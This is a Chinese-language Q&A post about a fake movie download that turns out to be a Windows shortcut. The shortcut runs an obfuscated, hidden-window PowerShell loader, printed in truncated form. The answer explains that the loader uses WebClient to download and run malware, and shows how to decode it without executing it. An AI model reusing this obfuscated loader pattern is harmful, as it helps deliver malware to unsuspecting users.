Eri*_*rik 6 virus shortcuts windows-10
在 Windows 10 中,我下载了这个我认为是电影的文件,但它是一个大小为 700MB 的快捷方式
我看到目标是这个
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP 。( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44,141, 163,160, 170,40, 75, 40, 50,50,116, 145,167,55, 1 142, 152,145, 143, 164,40,123,171,163,164, 145,155,56,116
它被设置为开始
%SYSTEMROOT%\System32\WindowsPowerShell\v1.0
它有什么作用?
这是一个恶意软件加载程序。
它执行以New-Object System.N...(隐藏在数字中)开头的 powershell 代码,其完整内容是New-Object System.Net.WebClient,该代码将进一步用于从 URL 下载和执行实际的恶意软件,该 URL 也隐藏在混淆代码的更多数字中。
如果您已经点击了该链接,那么您很可能已经被感染,除非该 URL 已被删除。
您可以尝试将您的行粘贴到记事本,然后删除之前的所有内容( -JoiN( (,复制剩余部分(以( -JoiN( (...开头)并将其粘贴到 PowerShell 窗口。它将公开了通常由前述执行的模糊处理的PowerShell代码$pshOmE[4]+$PShoMe[30]+'X')= iex= Invoke-Expression。
| 归档时间: |
|
| 查看次数: |
1297 次 |
| 最近记录: |